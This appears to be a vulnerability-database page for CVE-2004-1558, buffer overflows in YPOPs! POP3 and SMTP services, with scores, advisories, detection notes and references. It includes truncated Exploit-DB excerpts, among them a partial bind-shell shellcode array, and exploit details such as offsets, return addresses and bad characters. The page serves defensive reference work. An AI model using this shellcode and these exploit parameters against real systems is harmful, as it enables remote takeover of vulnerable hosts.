CVE-2004-1558
Published 2004-12-31
Priority: P3 · 50 · high · CVSS 2.0 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 71.11% (99.3rd percentile)
Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.
Affected (10 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypops | ypops | — | — |
| ypopsemail | ypops_! | — | — |
Detection & IOCs (extracted from sources)
- Detect exploit attempts by monitoring for the SMTP banner string 'YahooPOPs! Simple Mail Transfer Service Ready' followed by oversized payloads exceeding 503 bytes on the SMTP port.
- Alert on connections to TCP port 101 after an SMTP session to a YahooPOPs server, as the shellcode binds a shell on port 101 post-exploitation.
- Detect the JMP EBX opcode (\xff\xe3) appended after a large NOP sled and shellcode in SMTP traffic to YahooPOPs servers; the exploit constructs a payload of exactly 508 bytes minus shellcode size filled with \x90 NOPs.
- The Metasploit module uses a fixed offset of 503 bytes before the return address across all targets; monitor for SMTP payloads of ~503+ bytes sent to the YahooPOPs SMTP service.
- The exploit leverages a JMP EBX gadget in ws2_32.dll; monitor for EIP control redirecting to the ws2_32.dll address space on Windows hosts running YahooPOPs.
- For POP3 exploitation (CVE-2004-1558 related), monitor for requests exceeding 180 bytes on TCP port 110 to YahooPOPs, which can overwrite EAX and ECX.
- The JMP ESP return address (\x23\x9b\x02\x10) is sourced from libcurl.dll bundled with YahooPOPs, making it version-specific and not requiring an offset update per the exploit author.
- The SMTP overflow exploit cannot be directly adapted for POP3 (port 110) with a full bind/reverse shell due to insufficient buffer space; only a limited payload may fit on POP3.
- The Metasploit module targets YPOPS 0.6 (and possibly 0.5, 0.4.5.1, 0.4.5) via the POP3 service, while the standalone exploits (577, 582) target SMTP on version 1.6; detection rules should account for both service vectors.
- Bad characters for payload encoding are \x00 and \x25; payloads containing these bytes will not function correctly.
GHSA
GHSA-jf97-8p4h-gh74 (CVE-2024-24736, HIGH, CWE-120, CVSS 7.5) · ghsa_unreviewed · 2024-01-29
The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.
GHSA
GHSA-vfwv-p32r-49c7 (CVE-2004-1558, HIGH) · ghsa_unreviewed · 2022-04-29
Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.
No detection rules found.
Exploit-DB
YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit) · exploitdb · 2010-05-09 · CVE-2004-1558
---
```ruby
##
# $Id: ypops_overflow1.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # ... (module preamble not present in the indexed excerpt)
      'Name'           => 'YPOPS 0.6 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the YPOPS POP3
        service.
          This is a classic stack buffer overflow for YPOPS version 0.6.
        Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
        jmp ebx opcode in ws_32.dll
      },
      'Author'         => [ 'acaro ' ],
      'Version'        => '$Revision: 9262 $',
      'References'     =>
        [
          [ 'CVE', '2004-15
```
Exploit-DB
YahooPOPs 1.6 - SMTP Remote Buffer Overflow · exploitdb · 2004-10-18 · CVE-2004-1558
---
```c
//Diabolic Crab's exploit for YahooPOPs
#include
#include
#include
#include
#include
#include

char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\
```
Exploit-DB
YahooPOPs 1.6 - SMTP Port Buffer Overflow · exploitdb · 2004-10-15 · CVE-2004-1558
---
```c
/*
YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com
Bind a shellcode to the port 101.
Thanx to Behrang Fouladi([email protected]) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work

Instead of moving, like you Behrang, EBX to ESP after overwriting EIP,
I found out that only jumping to EBX is needed because our crafted payload
starts at EBX.

The exploit is tested working on Win2K SP4 and WinXP SP1, and it should work
also on NT4 and 2003 as the shellcode is designed for.
The jmp esp is from libcurl.dll which comes with yahoopops, just to notice there is no need of an offset update,
this is already "universal".

This exploit can't overflow th
```
Metasploit
YPOPS 0.6 Buffer Overflow · metasploit
This module exploits a stack buffer overflow in the YPOPS POP3 service. This is a classic stack buffer overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll
No writeups or analysis indexed.
References
- http://dbeusee.home.comcast.net/history.html
- http://marc.info/?l=bugtraq&m=109630699829536&w=2
- http://secunia.com/advisories/12660
- http://securitytracker.com/alerts/2004/Sep/1011426.html
- http://www.attrition.org/pipermail/vim/2006-October/001089.html
- http://www.hat-squad.com/en/000075.html
- http://www.osvdb.org/10366
- http://www.osvdb.org/10367
- http://www.securityfocus.com/bid/11256
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17515
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17518
Published 2004-12-31